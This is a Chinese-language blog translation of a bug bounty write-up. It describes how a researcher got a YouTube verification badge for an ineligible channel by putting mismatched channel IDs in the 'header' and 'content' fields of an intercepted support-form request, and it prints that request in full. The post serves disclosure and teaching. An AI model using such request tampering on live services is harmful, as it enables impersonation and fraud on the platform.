声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 |
博客新域名:https://gugesay.com
不想错过任何消息?设置星标↓ ↓ ↓
前言
本文将分享国外白帽如何为任意 YouTube 频道分配验证徽章的故事。
在故事开始前,有必要先科普一下验证徽章的一些背景知识:
验证徽章主要用于区分真正的名人或公司帐户与潜在的冒充者,从而防止可能导致的各种欺诈和冒充。
故事开始
首先,我们需要一个拥有 100,000 名以上订阅者的频道。因为这是获得徽章的前提条件。
Google工程师在设计该系统时考虑到,要进入提交请求的表单,需要在 Google账户中链接一个拥有 100,000+ 订阅者的频道。
当你没有达到所需条件时,会收到如下图的提示:
而当你符合条件时,会像下图所示:
然后是单击“立即申请”,会显示如下表格:
此处有 2 个字段:
填写这两个字段,然后打开诸如 Burp Suite 的代理工具,并拦截“提交”后生成的请求:
POST /apis/cufinsert?v=0&psd=%7B%7D&helpcenter=youtube&hl=en&key=support-content&request_source=1&service_configuration=&mendel_ids=REDACTED HTTP/1.1
Host: support.google.com
Cookie: SUPPORT_CONTENT=REDACTED
Content-Length: 5373
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Brave";v="126"
Content-Type: text/plain;charset=UTF-8
X-Supportcontent-Allowapicookieauth: true
X-Supportcontent-Xsrftoken: REDACTED
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 REDACTED
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.5
Origin: https://support.google.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
{"common_params":{"context_params":{"view_id":REDACTED}},"resource":{"form_id":"channel_verification","header":[{"name":"channel_name","value":"Japan"},{"name":"channel_id","value":"UCPu6Px6WxDjRgUNODpecwLg"},{"name":"subject_line","value":"Channel Verification Application"},{"name":"account_email","value":"redacted@gmail.com"},{"name":"\n\n:---- Automatically added fields ----","value":""},{"name":"Language","value":"en"},{"name":"IIILanguage","value":"en"},{"name":"country_code","value":"REDACTED"},{"name":"auto-helpcenter-id","value":"95"},{"name":"auto-helpcenter-name","value":"youtube"},{"name":"auto-internal-helpcenter-name","value":"youtube"},{"name":"auto-full-url","value":"https://support.google.com/youtube/contact/channel_verification?sjid=REDACTED"},{"name":"auto-user-logged-in","value":"true"},{"name":"auto-user-was-internal","value":"false"},{"name":"IssueType","value":"channel_verification"},{"name":"form-id","value":"channel_verification"},{"name":"form","value":"channel_verification"},{"name":"subject-line-field-id","value":"subject_line"},{"name":"body-text-field-id","value":""},{"name":"AutoDetectedBrowser","value":"Chrome 126.0.0.0"},{"name":"AutoDetectedOS","value":"Intel Mac OS X 10_15_7"},{"name":"MendelExperiments","value":"REDACTED"},{"name":"Form.support-content-visit-id","value":"REDACTED"},{"name":"experiment_0_id","value":""},{"name":"experiment_0_status","value":"OFF"}],"subject":"Channel Verification Application","content":"channel_name: Japan\nchannel_id: UCPu6Px6WxDjRgUNODpecwLg\nsubject_line: Channel Verification Application\naccount_email: redacted@gmail.com\n\n\n:---- Automatically added fields ----: \nLanguage: en\nIIILanguage: en\ncountry_code: REDACTED\nauto-helpcenter-id: 95\nauto-helpcenter-name: youtube\nauto-internal-helpcenter-name: youtube\nauto-full-url: https://support.google.com/youtube/contact/channel_verification?sjid=9325088441159645760-EU\nauto-user-logged-in: true\nauto-user-was-internal: false\nIssueType: channel_verification\nform-id: channel_verification\nform: channel_verification\nsubject-line-field-id: subject_line\nbody-text-field-id: \nAutoDetectedBrowser: Chrome 126.0.0.0\nAutoDetectedOS: Intel Mac OS X 10_15_7\nMendelExperiments: REDACTED\nForm.support-content-visit-id: REDACTED\nexperiment_0_id: \nexperiment_0_status: OFF\n","validate_only":false,"validation_info":"CgxjaGFubmVsX25hbWUKCmNoYW5uZWxfaWQKEXZlcmlmaWNhdGlvbl90ZXh0CgxzdWJqZWN0X2xpbmUKDWFjY291bnRfZW1haWw","language":"en","helpcenter_id":"95","active_experiments":"CjRzdWpfdmlkZW9fZXhwZXJpbWVudDo6c3VqX3ZpZGVvX2V4cGVyaW1lbnRfdHJlYXRtZW50","referer":"","referer_title":"","timezone_offset_minutes":420,"form_frd_values":[
请求大致是上面这样,上面的信息已经删除了所有 Cookie 和一些私人信息,因此上面所看到的是一个简化版本。
查看请求正文,首先为什么像 subject_line、account_email 和许多其它东西是客户端的?电子邮件应该从会话 Cookie 中派生,而不是从这样的字段派生。
接下来,再看body。由于某种原因,所有关键字段(如channel_name、channel_id 等)都存在两次。这确实会产生影响。
位于“header”下的第一批字段似乎更适用于后端,第二批相同的字段则位于“content”下。
这些内容的目的是让员工看到所提供的输入内容,从而进行验证,然后进行下一步操作,在本例中其实就是验证频道。
那么,如何验证一个不符合要求的频道呢?
非常简单,在“header” 中,插入不符合条件的频道ID,然后位于“channel_id:”之后在“content”中插入符合条件的频道ID字段。
最终的请求“header”部分如下:
"resource":{"form_id":"channel_verification","header":[{"name":"channel_name","value":"Japan"},{"name":"channel_id","value":"UCPu6Px6WxDjRgUNODpecwLg"},{"name":"subject_line","value":"Channel Verification Application"},
“UCPu6Px6WxDjRgUNODpecwLg”是一个10万订阅者以下的频道ID。
在“content”中的内容如下:
"content":"channel_name: Japan\nchannel_id: UC-9-kyTW8ZkZNDHQJ6FgpwQ\nsubject_line: Channel Verification Application
这里我使用了“UC-9-kyTW8ZkZNDHQJ6FgpwQ”,这是一个自动生成“音乐”的频道ID(https://youtube.com/channel/UC-9-kyTW8ZkZNDHQJ6FgpwQ)
Google 员工收到了请求后,发现UC-9-kyTW8ZkZNDHQJ6FgpwQ正在请求验证通道,但实际上是UCPu6Px6WxDjRgUNODpecwLg正在请求验证 。
如果他们继续处理请求并进行了批准,那么系统就会将徽章分配给UCPu6Px6WxDjRgUNODpecwLg通道。
该漏洞于几个月前上报,白帽小哥也因此收获了 500 美元的赏金奖励,并且徽章还被保留了下来。
你学到了么?
以上内容由骨哥翻译并整理。
原文:https://vojtechcekal.medium.com/how-i-was-able-to-give-verification-badge-to-any-youtube-channel-and-bypass-needed-requirements-b88855afe4b7
加入星球,随时交流:
(前50位成员):99元/年
(后续会员定价):128元/年
感谢阅读,如果觉得还不错的话,欢迎分享给更多喜爱的朋友~
====正文结束====